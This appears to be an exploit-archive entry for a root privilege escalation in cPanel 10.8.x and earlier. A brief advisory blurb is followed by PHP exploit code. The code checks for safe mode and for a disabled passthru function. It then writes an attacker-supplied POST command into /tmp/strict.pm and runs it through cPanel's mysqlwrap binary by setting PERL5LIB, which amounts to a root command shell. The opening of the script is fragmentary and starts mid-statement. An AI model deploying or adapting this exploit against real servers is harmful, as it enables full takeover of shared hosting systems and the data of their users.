cPanel <= 10.8.x cpwrap root exploit (PHP)

source: https://www.securityfocus.com/bid/20163/info cPanel is prone to a remote privilege-escalation vulnerability. A remote attacker can exploit this issue to gain administrative access to the affected application. This may lead to other attacks. cPanel <= 10.8.x cpwrap root exploit (PHP)

Sorry Safe-mode Is On ( Script Not Work On This Server )

"; echo "

Powered By Ashiyane Security Corporation www.Ashiyane.ir"; exit(); } $disablef = @ini_get("disable_functions"); if (!empty($disablef)) { $disablef = str_replace(" ","",$disablef); $disablef = explode(",",$disablef); if (in_array("passthru",$disablef)) { echo "

Sorry Passthru Is Disable ( Script Not Work On This Server )

"; echo "

Powered By Ashiyane Security Corporation www.Ashiyane.ir"; exit(); } } ?>

<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>